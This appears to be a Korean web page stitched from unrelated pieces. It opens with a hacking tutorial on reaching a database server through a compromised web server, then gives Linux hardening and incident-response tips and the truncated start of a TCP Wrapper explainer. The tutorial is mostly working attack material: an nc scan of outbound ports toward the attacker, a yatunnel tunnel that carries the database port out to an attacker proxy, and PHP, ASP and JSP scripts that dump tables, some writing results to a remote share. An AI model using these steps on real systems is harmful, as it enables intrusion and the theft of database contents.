개발자(開發者) a developer

웹서버를 경유한 DB서버 해킹


방화벽의 Private또는 DMZ에 웹서버또는 DB와 연동할 수 있는
서버를 점령 후에 어떻게 DB 서버를 해킹하는가에 대한 궁금증 해결을 위해 작성한 문서이다.
-----------------------------------------------------------------------------------------------------------------
I. 네트워크 구성도
1) 인터넷  -------방화벽------- 웹서버 --------방화벽---------DB서버

2) 인터넷  -------방화벽------- 웹서버   
                               DB서버 
                               (DMZ존)
------------------------------------------------------------------------------------------------------------------
II. 개요
본 문서에 있는 방법은 이미 다 알고 있는 내용이거나 인터넷에 찾아 보면 다 나오는 내용들이다
내용상의 틀린 부분이 있으면 지적해 주시면 감사감사~~~
Private 또는 DMZ에 위치하는 DB 서버를 해킹 하기 위해선
먼저 DB 접속 인증 id/passwd 또는 sid 를 알아야 하며 또한 웹서버를 경유하여 DB와 접속을 하여야 하므로
어떤 방법으로든 웹서버는 점령하여야 한다.
웹서버 점령에 관해서는 이 문서에서는 언급 하지 않는다.
이유는 너무나 많은 방법이 있으며 나도 그 모든 방법에 대해서 모른다.
또한 이와 같이 삽질을 안하고도 대다수의 웹서버의 temp,tmp디렉토리 또는 admin 권한으로 DB의 내용을 획득할
수도 있으나 어쩔수 없이 DB 쿼리를 해야 하는 상황에 대해서 설명한다.
물론 해당 웹서버를 직접 공격하지 않고 sql injection 공격을 할 수 있으면 아래와 같은 삽질은 하지 않아도 될것이다.
일단 방화벽 내의 웹서버를 점령한 후 DB서버를 해킹 하는 방법은 상당히 많은
방법이 있으며 dbms의 종류 웹서버의 종류 cgi의 종류에 따라 많은 조합의 공격법이 있다.
또한 DB 서버를 해킹할때 root권한 획득과 같은 방법은 별 필요가 없을 것이다.
왜냐하면 결국 DB 서버의 해킹의 목적은 DB의 내용을 획득하는 것이기 때문에 root권한이 필요가 없다.
DB를 쿼리하기 이전에 웹서버 앞의 Firewall Rule에 따라 접근개념이 틀려 질 수 있으므로
아래와 같이 크게 2가지 분류로 나누어 접근하도록 하겠다.
Firewall Rule을 파악하기 위해서 공격자의 PC에 Sniffing Tool을 설치하고 해당 웹서버에는 nc를 설치한다.
공격자의 PC에서는 해당 웹서버에서 공격자 PC로 전송되는 패킷에 대한 검사를 수행하고
해당 웹서버에서는 다음과 같이 실행한다
nc -v -w2 -z [공격자 PC IP] 1-65535
이는 해당 웹서버에서 공격자 PC로의 어떤 서비스가 통과 가능한지 파악하기 위함이다.
Firewall Rule에서 특정 서비스에 대해서만 Accept되어 있을 수 있다 예를 들어 외부로 나가는 dns또는 특정 Application의
update서비스와 같이 특정 서비스만 Accept되어 있으면 그 서비스를 판단할 수 있다.
또한 공격자의 PC에서 Sniffing을 설치하여 패킷 검사를 하는 이유는 nc는 nmap과 같이 closed와 filtered를 구분하지
못하기 때문에 수동으로 패킷을 검사하여 확인을 한다.
nc수행 결과 공격자의 PC로 한개 이상의 syn 패킷이 전송이 된다면 아래 1번 방법으로 DB 쿼리가 가능하다
2번 방법은 웹서버에서 인터넷구간으로의 Outbound Rule이 서비스 전체에 대해 Deny일 경우로
해당 웹서버의 cgi를 이용하여 DB쿼리를 수행한다.

-------------------------------------------------------------------------------------------------------------------
III. 실전 DB 해킹
1) Firewall Rule에서 Source IP가 웹서버에서 외부 인터넷구간으로의 Outbound Rule이 Accept인 경우
이는 port redirect(cevert tunnel, reverse telnet)이 가능한 상태이다.
즉 외부에서 해당 웹서버의 쉘을 띄울수가 있는 상태이므로 쉽게 DB쿼리가 가능하다.
우선 공격대상 네트워크는 아래와 같다고 가정한다.
실제 Firewall/네트워크 구성이 상당수 기업들이 이와 유사하게 설정 되어 있다.
===================================================================================================================
[공인:210.210.210.210]                         [공인: 220.220.220.220]                       [사설:192.168.0.100]
공격자 PC1 -------------------- 방화벽 ----------------- 웹서버 ------------방화벽----------------- DB 서버
                      Any    웹서버 80     Accept              웹서버   DB서버  DB서비스 Accept
                      Any    웹서버 Any    Deny                Any      DB서버  Any      Deny
                      웹서버 Any    8080   Accept
                      웹서버 Any    Any    Deny
공격자 PC2(Proxy 서버)
[공인:210.210.210.211]
=====================================================================================================================
port redirect는 yatunnel이란 tool을 이용하여 아래와 같이 수행한다.
만일 웹서버에 sql client툴이 있을경우 이를 이용하면 쉽게 DB에 접속하여 쿼리를 할 수 있으나
경험상 아마도 없을 것이다. ^^;
- 공격자 PC2(Proxy 서버)에서의 작업
 Proxy 서버측에서 웹서버와 Tunneling 할 port를 open한다.
 [root@Proxy Server]# ./tun-proxy -p 12345

- 웹서버에서의 작업
 tun-server의 소스를 보면 127.0.0.1:22로 redirect를 한다.
 이 부분은 자신이 원하는 주소와 port를 수정하여 사용 가능하다.
 즉, 다른 호스트로 redirect가 가능하다. 즉 이를 192.168.0.100:1433으로 수정한다.
 MSSQL:1433, Oracle:1521, MySQL:3306
 [green@Internal Server]$ ./tun-server -h 210.210.210.211 -p 12345
- 공격자 PC1 에서의 작업
 각종 SQL Client를 이용하여 210.210.210.211:12345로 DB와 Connect하고 DB 쿼리를 한다.
 MSSQL, MySQL, Oracle에 대한 SQL Client는 아래 사이트에 있는 SQL Gate가 사용이 용이하고 쉽다.
 http://www.sqlgate.com/html/index.html
* yatunnel을 이용한 SQL Client 연결은 한번도 테스트는 해 보지 않았다
 안될 이유는 없을것 이라고 판단이 되나 누군가 테스트 해 볼 기회가 된다면 안되면 연락을 주길 바란다.

2) Firewall Rule에서 Source IP가 웹서버에서 외부 인터넷구간으로의 Outbound Rule이 Deny인 경우
Outbound Rule이 Deny일 경우 순전히 해당 웹서버의 cgi를 이용하여 DB 쿼리를 하여야 한다.
이는 상당히 많은 조합이 필요하다 ㅠㅠ;
가장많이 사용되는 php, asp, jsp를 예로 들어 보겠다.
2-1) php를 사용할 경우
가장 먼저 DB Name과 Table Name을 알아야 DB 쿼리를 한다.
웹서버의 php파일들을 뒤져서 DB Name과 Table Name을 찾아 낼수 있지만 이 얼마나 노가다 인가...
그래서 아래와 같은 DB 구조 파악을 할 수 있는 php파일을 실행 시키자.
아래의 예제는 Mysql을 예로 들었다.
물론 아래의 몇몇 변수는 시스템 환경에 맞게 수정을 하여야 한다.

------------------------------------디비/테이블 알아내기---------------------------------------------
<?
$db = mysql_connect($host, $user, $password);
mysql_select_db($database);
//전체 DB보기
$db_list = mysql_list_dbs($db);
echo "전체 DB >>>>>";
while ($row = mysql_fetch_object($db_list)) {
$database= $row->Database;
echo "<a href=$PHP_SELF?dbname=$database>$row->Database </a>|| ";
}
$table_rs = mysql_list_tables($database);                  ////// 테이블을 볼 테이타 베이스명
echo "<style>td {font-size:9pt}</style>
<table >
<tr>";
$rows = 0;
while($tables = mysql_fetch_array($table_rs)){
       $query = "select * from $tables[0]";
       $field_rs = mysql_query($query, $db);
       $field = mysql_fetch_field($field_rs);            /////////// 필드명 구하기
       $cols = mysql_num_fields($field_rs);              /////////// 필드수 구하기
       if($rows%5 == 0) echo "</tr><tr><td height=20></td></tr><tr>";      //// 칼럼수가 5개 이면 줄 바꿈
       echo "<td valign=top>
             <table width=180 cellspacing=0 border=1 bordercolordark=white bordercolorlight=black>
               <tr>
                   <td colspan=2 align=center><b>$tables[0]</b></td>
               </tr>
               <tr align=center>
                   <td >필드명</td>
                   <td >Type</td>
               </tr>";
for($i=0; $i < $cols; $i++){
               echo "
               <tr align=right>
                   <td>".mysql_field_name($field_rs, $i)."</td>
                   <td>".mysql_field_type($field_rs, $i)." (".mysql_field_len($field_rs, $i).")</td>
               </tr>\n";
       }
       echo "</table></td>";
       $rows++;
}
echo "</tr></table>";
?>
-------------------------------------------------------------------------------------------------------------

-----------------------------테이블의 데이타 쿼리하기--------------------------------------------------------
// 데이타 양이 많을경우 디져버릴수 있으니 게시판 형태로 수정하여야 한다.
<?

$connect=mysql_connect("localhost","user_id","password") or  die("Fail to connect SQL");
mysql_select_db( "database_name",$connect);
print "<HTML>n"; 
echo("<h2>
       테이블  $tab_name  의 모든 데이타를 가져옵니다
    </h2>");
print " <form action=$PHP_SELF>";

$stmt = "SELECT * FROM $tab_name";
 $nresult = mysql_query($stmt,$connect );
 $nrows = mysql_affected_rows();
 $results=mysql_fetch_array($nresult);
if ( $nrows > 0 ) {
       print "<TABLE BORDER="1">n";
       print "<TR>n";
       $j=0; 
       while ( list( $key, $val ) = each( $results ) ) {
              if ( $j%2==1  )   print "<TH> $key</TH>n";
             $j++; 
       }     
       print "</TR>n";
                        
      $k=0; 
      for ( $k = 0; $k < $nrows; $k++ ) {
            mysql_data_seek($nresult,$k);
            $results=mysql_fetch_array($nresult);
          
            $m=0; 
            while ( list( $key, $val ) = each( $results ) ) {
                  if ( $m%2==1  )   print "<TD> $val</TD>";
                  $m++;
           } // end of while
            print "</TR>";
    } // end of for
print "</TABLE>n";
} else {
       echo "No data found<BR>n";
}     
print "$nrows Records Selected<BR>n";
                      

print " INPUT TABLE NAME <input type=text name=tab_name value=$tab_name>";
print " <br> <input type=submit value='검색'>";
print " </form>";
print " </html>";
?>
-------------------------------------------------------------------------------------------------------

------------------------------------테이블의 쿼리값을 파일로 저장---------------------------------------
<?

$connect=mysql_connect("localhost","user_id","password") or  die("Fail to connect SQL");
mysql_select_db( "database_name",$connect);
$stmt = "select * from tablename into outfile 'filename'";
mysql_query($stmt,$connect );
?>
--------------------------------------------------------------------------------------------------------

2-2) asp 를 사용할 경우
asp를 사용한다면 90% 이상 mssql과 조합을 이루고 있을 것이다.
Mssql은 sp_maskwebtask API가 있어 상당히 편리(?)하다.
쿼리한 결과값을 화면에 출력하는 수고를 하지 않아도 된다.
이 방법은 asp에만 사용되는 방법이 아니라 해당 DBMS가 MSSQL이라면 php또는 jsp 에서도 해당 cgi에 맞게 DB Connect후
sql query만 아래와 같이 실행하면 된다.
sp_maskwebtask를 이용하여 쿼리의 결과값을 Local서버 또는 Remote서버로 html로 저장시킬 수 있다.
EXEC sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'select * from sysobjects where xtype = ''U'''
이 명령어로 sysobjects에 있는 User가 생성한 DB 테이블을 쿼리한 결과값을 c:\inetpub\wwwroot\sqloutput.html에 저장한다.
EXEC sp_makewebtask '\\10.0.0.8\public\hack.htmk', 'SELECT * FROM user'
또한 쿼리한 결과값을 remote에 저장시킬 수 있다.
---------------------------------------------------------------------------------------------------------
테이블 정보 알아내기
<%
set Conn = server.createobject("adodb.connection")
Conn.Open "test","sa", ""
set rs = Conn.Execute(" EXEC sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'select * from sysobjects where xtype = ''U''' ")
%>
-----------------------------------------------------------------------------------------------------------
자 이제 sales 테이블의 결과를 보자.
-----------------------------------------------------------------------------------------------------------
해당 sales 테이블의 전체 내용 쿼리하기
<%
set Conn = server.createobject("adodb.connection")
Conn.Open "test","sa", ""
set rs = Conn.Execute(" EXEC sp_makewebtask 'c:\inetpub\wwwroot\aaa.html', 'select * from sales' ")
%>
-----------------------------------------------------------------------------------------------------------
우와 간단하고 좋다... 역시 MS...

2-3) jsp 를 사용할 경우
jsp일 경우 Windows, *nix와 같이 시스템에 상관없이 운영되기 때문에
연결한 DBMS가 MSSQL, MYSQL, Oracle, Informix 등 다양한 DBMS와 연결을 한다.
가장 많이 사용되는 MSSQL과 Oracle을 예로 들어보잣...
먼저 MSSQL은 asp를 사용할 때와 마찬가지로 sp_maskwebtask API를 사용해서 DB 쿼리를 수행할 수 있다.
---------------------------------------------------------------------------------------------------------
MSSQL 테이블 정보 알아내기
<%@ page contentType="text/html; charset=euc-kr" %>
<%@ page import="java.sql.*, java.io.*"%> 
<%
 String url ="jdbc:freetds:sqlserver://192.168.0.10:1433/WEBDB";
 String id = "sa";
 String pass = "";
 Class.forName("com.microsoft.jdbc.sqlserver.SQLServerDriver"); 
 Connection conn = DriverManager.getConnection(url,id,pass); 
  
 Statement stmt = conn.createStatement(); 
 String sql = " EXEC sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'select * from sysobjects where xtype = ''U''' "; 
 ResultSet rs = stmt.executeQuery(sql);   
%>
-----------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
MSSQL sales 테이블 쿼리하기
<%@ page contentType="text/html; charset=euc-kr" %>
<%@ page import="java.sql.*, java.io.*"%> 
<%

 String url ="jdbc:freetds:sqlserver://192.168.0.10:1433/WEBDB";
 String id = "sa";
 String pass = "";
 Class.forName("com.microsoft.jdbc.sqlserver.SQLServerDriver"); 
 Connection conn = DriverManager.getConnection(url,id,pass); 
  
 Statement stmt = conn.createStatement(); 
 String sql = " EXEC sp_makewebtask 'c:\inetpub\wwwroot\aaa.html', 'select * from sales' "; 
 ResultSet rs = stmt.executeQuery(sql);   
%>
-----------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------
Oracle 테이블 정보 알아내기
<%@ page contentType="text/html; charset=euc-kr" %>
<%@ page import="java.sql.*, java.io.*"%>
<%
 Class.forName("oracle.jdbc.driver.OracleDriver");
 String JDBCDriverType = "jdbc:oracle:thin";
 String DBHost = "test.inzen.com";
 String Port = "1521";
 String SID = "ORA8";
 String url = JDBCDriverType+":@"+DBHost+":"+Port+":"+SID;
 String userID = "test";
 String password = "test";
 String query = "select * from tab";
 Connect con = DriverManager.getConnection(url, userID, password);
 Statement stmt = con.createStatement();
 ResultSet rs = stmt.executeQuery(query);
 File outputFile = new File("jsp웹루트디렉토리/oratable.txt");
 FileWriter fout = new FileWriter(outputFile);
 PrintWriter ps = new PrintWriter(new BufferedWriter( fout ));
 while ( rs.next() ) {
  ps.print ( rs.getString ( 1 ) ) ;
  ps.print ( "        " ) ;
  ps.println ( rs.getString ( 2 ) ) ;
 }
 ps.close() ;
%>
---------------------------------------------------------------------------------------------------------------
위의 File outputFile 에 파일명을 지정하는데 절대 경로와 상대경로 다 쓸 수 있다.
만약 jsp 의 엔진으로 tomcat 을 사용하고 있는경우 /usr/local/jakarta-tomcat/bin 에 default 로 파일이 생성되게 된다.
그러므로 웹에서 불러 올수 있는 경로를 지정해야 한다.
/usr/local/jakarta-tomcat/webapps 의 위치가 jsp 웹  루트 디렉토리라면
File outputFile = new File("/usr/local/jakarta-tomcat/webapps/oratable.txt");
이런 식으로 지정을 한다.
---------------------------------------------------------------------------------------------------------------
Oracle 특정 테이블 쿼리하기
<%@ page contentType="text/html; charset=euc-kr" %>
<%@ page import="java.sql.*, java.io.*"%>
<%
 Class.forName("oracle.jdbc.driver.OracleDriver");
 String JDBCDriverType = "jdbc:oracle:thin";
 String DBHost = "test.inzen.com";
 String Port = "1521";
 String SID = "ORA8";
 String url = JDBCDriverType+":@"+DBHost+":"+Port+":"+SID;
 String userID = "test";
 String password = "test";
 String query = "select gongi, day from gongi";
 Connect con = DriverManager.getConnection(url, userID, password);
 Statement stmt = con.createStatement();
 ResultSet rs = stmt.executeQuery(query);
 File outputFile = new File("jsp웹루트디렉토리/oratable.txt");
 FileWriter fout = new FileWriter(outputFile);
 PrintWriter ps = new PrintWriter(new BufferedWriter( fout ));
 while ( rs.next() ) {
  ps.print ( rs.getString ( 1 ) ) ;
  ps.print ( "        " ) ;
  ps.println ( rs.getString ( 2 ) ) ;
 }
 ps.close() ;
%>
---------------------------------------------------------------------------------------------------------------
The End.

1.chmod 700변경하기
본 권한변경 목적은 계정을 통하지 않은 불법적인 접근을 막기
위한 방법으로 가능한 필요하지 않은 파일들의 권한을 변경해
주시기 바랍니다. 특히 suid가 걸린 파일의 경우 절대적으로
권한변경을 해주시기 바랍니다.
/usr/bin/finger(chmod 700 적용) <-- 서버 이용자 파악을 하지 못하게 함
/usr/bin/nslookup(chmod 700 적용)
/usr/bin/gcc(chmod 700 적용) <-- 당연히 막아줘야져.
/usr/bin/suidperl(chmod 700 적용) <--suid 걸린 파일
/usr/bin/whereis(chmod 700 적용)
/usr/bin/cc(chmod 700 적용) <--- 소스 컴파일은 루트이외에 못하도록 조치
/usr/bin/sperl5.00503(chmod 700 적용) <--- perl중에 suid걸린 파일임
/usr/bin/c++(chmod 700 적용)
/usr/bin/make(chmod 700 적용)
/usr/bin/pstree(chmod 700 적용)
/usr/bin/rlog(chmod 700 적용)
/usr/bin/rlogin(chmod 700 적용) <-- 필요없는 경우에는 삭제 하시길
/usr/bin/which(chmod 700 적용)
/usr/bin/who(chmod 700 적용)
/usr/bin/w(chmod 700 적용)
/bin/mail(chmod 700 적용) <-- 아웃룩익스프레스가 아닌 계정상에서
텔넷으로 메일을 확인하지 못하게 하십시요.
/bin/ps(chmod 700 적용)
/etc/hosts(chmod 700 적용)
/etc/hosts.deny(chmod 700 적용)
/etc/hosts.allow(chmod 700 적용)
2.anonymous ftp 막기
#vi proftpd.conf (/etc 에 위치)
중략
에서
UserAlias anonymous ftp //이부분을 주석처리 해준다.
wq (저장후 종료)
3.telnet 사용막기 <--가장 추천하는 방법입니다.
현재 텔넷이 막힌 경우에는 해킹의 위험이 극히 줄어듭니다.
텔넷을 사용하시고자 하시는 분은 데이터 센터의 보안 서비스나
다른 방법을 사용하시기 바랍니다.

ip 거부
#vi hosts.deny (/etc 에 위치)
in.telnet:ALL
wq (저장후 종료)
#hosts.allow (/etc에 위치)
ALL:(IP 추가) <--- 텔넷으로 들어올 아이피만 적는다.
wq (저장후 종료)
저장후 다음과 같이
#/etc/rc.d/init.d/inet restart
telnet 서비스 제공업체측 ip를 추가해야 telnet 사용가능
4.ping 막는법 <---당연히 핑도 막아야 겟죠.
#echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all //ping 막기
#echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all //ping 열기
5.chkconfig 사용법(부팅시 수행되는 서비스) <--중요합니다.
#chkconfig --list (/sbin 밑에 위치)
#chkconfig --help (참고)
#chkconfig --level 3 sendmail off (사용방법예)
보통 부팅의 경우 레벨3으로 부팅이 됩니다.
그러므로 레벨3에서 필요하지 않은 데몬은 위와 같은 방법으로
모두 꺼두시기 바랍니다.
#chkconfig --list (하면 나오는것들)
xfs 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
anacron 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
apmd 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
arpwatch 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
atd 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
keytable 0:끔 1:끔 2:켬 3:켬 4:켬 5:켬 6:끔
gpm 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
inet 0:끔 1:끔 2:끔 3:켬 4:켬 5:켬 6:끔
netfs 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
network 0:끔 1:끔 2:켬 3:켬 4:켬 5:켬 6:끔
random 0:끔 1:켬 2:켬 3:켬 4:켬 5:켬 6:끔
ipchains 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
pcmcia 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
kdcrotate 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
kudzu 0:끔 1:끔 2:끔 3:켬 4:켬 5:켬 6:끔
linuxconf 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
lpd 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
nfs 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
nfslock 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
identd 0:끔 1:끔 2:끔 3:켬 4:켬 5:켬 6:끔
portmap 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
rstatd 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
rusersd 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
rwalld 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
rwhod 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
sendmail 0:끔 1:끔 2:켬 3:켬 4:켬 5:켬 6:끔
syslog 0:끔 1:끔 2:켬 3:켬 4:켬 5:켬 6:끔
snmpd 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
crond 0:끔 1:끔 2:켬 3:켬 4:켬 5:켬 6:끔
ypbind 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
yppasswdd 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
ypserv 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
proftpd 0:끔 1:끔 2:끔 3:켬 4:켬 5:켬 6:끔
named 0:끔 1:끔 2:끔 3:끔 4:끔 5:끔 6:끔
이중 켜야할것은 보통 9개정도밖에 안됩니다. 3번레벨을
기준으로, keytable,inet, network,random,kudzu,sendmail,syslog,
crond,proftpd 나머지는 off 시켜주는것이 바람직합니다. (자기의
환경에 맞춰서)
참조문서는 http://www.osfs.net/redhat/security-guide-01.doc
6.find 관련 명령
#find /dev -type f // /dev/MAKEDEV만떠야함 (백도어 찾기)
#find / -ctime -1 //하루동안 만들어진 화일 (해킹당한듯 싶으면 확인 )
#find / -perm -4000 // setuid 걸린 파일을 찾는 명령어
7./etc/inetd.conf 화일 수정
네트워크의 서비스를 정의하고 있는 화일로서 , 정의되어 있는
서비스가 많이 있다. 보안사고를 피하기 위해서는 최대한
필요하지 않은 서비스는 차단하는게 바람직하다. 기본적으로 ,
telnet,ftp,pop3외의것은 주석처리 하는것이 좋다. 닫아놨는데,
이외의 것이 열려있다면 해킹의 가능성이 있다. 이때는 다시
주석처리를 하고
#ps -ef | grep inetd //프로세스 확인
#kill -HUP PID //리셋
#vi inetd.conf (/etc 에 위치)
telnet
ftp
pop3
나머지는 주석처리
wq (저장후 종료)
tip> #kill -9 PID //프로세스 죽이기
8.해킹이 확실한경우 대처법
해킹이 확실한상태에서 그냥 컴퓨터를 종료시키면, 재부팅이
안될수가 있다. 이것을 막기 위해,
#/etc/rc.d/rc.SYSinit 권한을 755를 준다. 최소한 부팅은 된다.
서버 & 보안 관련 문의
http://www.besthan.net 또는 http://www.koreaphp.co.kr
해킹시 연락처
http://www.certcc.or.kr/ 해킹시 신고처
cyber 테러대응센터 02-3939-112
cyber 수사대 02-365-7128
해킹 없는 세상에 살고싶은 오렌지블루였슴돠.


PART II는 PART I에서 수정되어야 하는 부분이나 추가 되어야 할
내용을 추가 했습니다. 보안을 위해 이문서를 참조하는 것도 좋습니다.
그러나 서버 운영 특성상 꼭 필요한 경우도 있으나 이 제한을 걸어서
사용할수 없는 경우가 있으니 꼭 확인후 조치를 부탁합니다.
(이 문서를 끝까지 읽어 주시면 서버운영에 많은 도움이 될듯합니다.)
- 문의 사항은 khsheen@inempire.com으로 해 주십시요
설명순서는 PART I 에서 설명을 보충하고 기타 더 필요한 설명을
추가 하겠습니다.
<보안관련및 기본명령>
1.chmod 700변경하기

첨부 명령어
/usr/bin/top (chmod 700 적용)
/usr/bin/find (chmod 700 적용)
/usr/bin/lynx (chmod 700 적용)
/usr/bin/wget(chmod 700 적용)
--> 이두 명령어는 일반적으로 해커들이 해킹툴을 가져올때 자주쓰는
명령어
shell-prompt>lynx --dump 가져올화일이 있는 url 경로
shell-prompt>wget 가져올화일이 있는 url 경로

/usr/bin/gcc(chmod 700 적용) <-- 당연히 막아줘야져.
/usr/bin/c++(chmod 700 적용)
/usr/bin/make(chmod 700 적용)
이 명령어를 막게 되면 일반사용자들이 C언어로 작성된 프로그램을
컴파일하지 못하여 불평을 호소하는 경우가 있다.
이런 경우는 이 명령어를 사용할수 있는 그룹을 설정해 주면 준다.
(일반적으로 wheel이라는 그룹을 많이 사용함, 다른 그룹을 등록해서
사용해도 무관)
* example) find 명령어의 사용자를 제한 할 경우
shell-prompt>grep wheel /etc/group
wheel:x:10:root
/etc/group 화일에 wheel:x:10:root 이분에 wheel이라는 그룹에 user를
추가 한다.(khsheen이라는 user가 있을경우임)
wheel:x:10:root,khsheen
이러면 wheel이라는 그룹에 khsheen 이라는 user가 등록된다.
shell-prompt>ls -la /usr/bin/find
-rwxr-xr-x 1 root root 54544 Feb 3 2000 /usr/bin/find*
shell-prompt>chgrp wheel find
shell-prompt>chmod 755 find
shell-prompt>ls -la /usr/bin/find
-rwxr-x--- 1 root wheel 54544 Feb 3 2000 find*
이런식으로 설정하면 find 명령어는 root와 khsheen만 사용할수 있다.
이 명령어를 su 명령어에도 적용하는 것을 권장함, root로 전환할
유저 (su 명령어 사용자)를 제한 할수 있다.
2.anonymous ftp 막기
특정 user가 ftp 접속후 본인의 Directory 외에 다른 유저의
Directory를 접근 못하게 할 경우
(접근을 해서 read 권한만있어도 그 유저의 설정을 모두볼수있다.)
*proftp를 사용하는 경우
shell-prompt> vi /etc/proftpd.conf
이 화일에 이 한줄을 추가한다.
DefaultRoot ~ member
shell-prompt>/etc/rc.d/init.d/proftpd restart
이러면 본인의 Directory외에 다른 유저의 계정은 접근 불가.
3.telnet 사용막기
telnet을 막는 다는 것은 특히 유저가 많은 경우는 불가능 일인것
같다. (특히 웹호스팅업체) 이런 경우는 ssh(Secure Shell)을
설치해서 사용하는 것을 권장합니다.
6.find 관련 명령어 관련 명령어 사용하기
shell-prompt> find / -nouser (화일에 소유자가 없는 경우의 화일)
일반사용자의 사용 디렉토리에서 ...
화일에 소유자가 없다는것은 의심을 해볼필요가 있다.
shell-prompt> find /home/khsheen -user root
(일반사용자인데 root로 되어 있는 화일도 의심해볼 필요가 있다)
8.해킹이 확실한경우 대처법
a.우선 가장 좋은 방법은 port(랜선)를 제거하는 것이 가장 좋다.
b.그 다음에 설치 되어 있는 해킹툴을 제거한다.
-프로세스 확인
[ 이상한(필요없는) 프로세스 확인해서 설치된 위치 확인후 지우기]
shell-prompt> kill -9 이상한 프로세스 id
그러나 100%제거 한다는 것은 힘들것 같다.
서버를 제 세팅하는 것을 권장한다.
c.중요 data 백업

9.기타 보안에 관련된 내용
a.php , mysql db 지원하는 경우
-일반적으로 php로 mysql에 db에 접속하는 경우 php에서
connect하는 스크립트를 사용하는 화일을 일반적으로 Web상에
공개된 소스에는 화일명이 대부분 connect.inc 를 사용하는데
이것을 웹브라우저에 불러오게 되면 바로 읽혀 져서 mysql db접속
아이디와 패스워드를 알수가 있게된다.
이럴경우는 웹서버의 설정화일(httpd.conf)에
AddType application/x-httpd-php .php .html .php3 .php3 .inc
~~~~~!!
AddType application/x-httpd-php-source .phps
추가하고 웹서버를 제구동한다.
그러면 .inc로 끝나는 화일도 php로 인식하므로 스크립트
노출을 막을수 있다.
또한가지 telnet ftp에 사용시 group을 같게 해주고 각 계정의
root Directory를 퍼미션을 705로 처리해 주면 다른 유저가
다른 사용자의 계정에 들어 갈수가 없다.
만약 755로 한다면 다른 유저에게도 읽을 권한이 생겨서 connect
스크립트를 읽을 수 있어 db접속 아이디/passwd를 얻을수 있다.
b.사용자들의 passwd
- 등록된 user의 passwd를 자주 갱신하게 만든다.
shell-prompt>vi /etc/login.defs
이중 아래의 스크립트를 일정기간 설정해서 사용자들의
passwd를 바꾸게 만든다.
PASS_MAX_DAYS 99999
~~~~~ 일정기간으로 잡아준다.
c.shell 없애기
- 메일계정으로만 사용하는 경우(shell이 필요없는 경우)의
유저가 많다. 특히 웹호스팅 사용자
이런 경우 shell을 주지 않으면 된다.
shell-prompt>vipw
khsheen:x:500:502::/home/gdm:/bin/false
~~~~~~~~~~
khsheen이라는 유저에게 shell을 부여하지 않는다.

- 서버에 등록된 사용자가 많은 경우 사용자가 관리에
신경을 많이 써야 한다. last 명령을 사용하여 자주 telnet으로
접속하는 사용자는 history를 자주 살펴보는 것도 좋다.
shell-prompt> last | grep pts

d.보안패치하기
-서버 보안에서 가장 중요한 것이 패치이다.
서버에 버그가 발표되면 해커도 그것을 접한다고 생각하면 된다.
그래서 서버에 최신 패키지를 설치해야 하며 보안 뉴스를 빨리
접해야 한다. 그중 커널 업테이드등은 중요한다.
* 커널 최신 정보 확인하기
shell-prompt>finger @www.kernel.org
[zeus.kernel.org]
The latest stable version of the Linux kernel is: 2.2.17
~~~~~~
The latest beta version of the Linux kernel is: 2.4.0-test11
The latest prepatch (alpha) version *appears* to be: 2.4.0-test12-pre4

2. 2. 17
| | |
| | -> 몇번의 패치가 있었는지 나타낸다.
| -> 안정화 버전인지 개발화 버전이지를 나타낸다.
| (홀수:개발, 짝수:안정)
-> 획기적인 변화가 있을때 바뀐다

그리고 기타 패키지에 대한 버그는 빨리 접하고 패치를 해야 한다.
http://www.redhat.com/support/errata/index.html (redhat인 경우)
해킹관련 소식 접하기
http://certcc.or.kr/ (한국정보 보호센터)
http://www.hackersnews.org/
http://www.securenews.co.kr/

initAd();

---

1. What's TCP Wrapper ?
2. Why TCP Wrapper is used ?
3. How does it work?
4. How to install and use TCP Wrapper
5. Reference

---

 1. What's TCP Wrapper.

 TCP Wrapper 란 현재의 시스템에서 SYSTAT, FINGER, FTP, TELNET, RLOGIN, RSH, EXEC, TFTP,TALK 등의 monitoring를 하고 filtering을 할 수 있게 해주는 것이다 .
 이것은 현재 깔려있는 소프트웨어나 설정화일을 변경시키지 않고 깔 수있는 작은 daemon 프로그램으로 클라이언트 호스트와 요구받은 서비스의 이름은 report를 한다. 그래서 서버나 클라이언트 프로그램의 정보를 변화 시키지 않고 , 처음 connection 을 연결할 때에만 동작하므로 클라이언트나 서버의 application 간의 실제의 데이터 통신에서는 오버헤드가 발생하지 않는다 .

 2. Why TCP Wrapper is used?

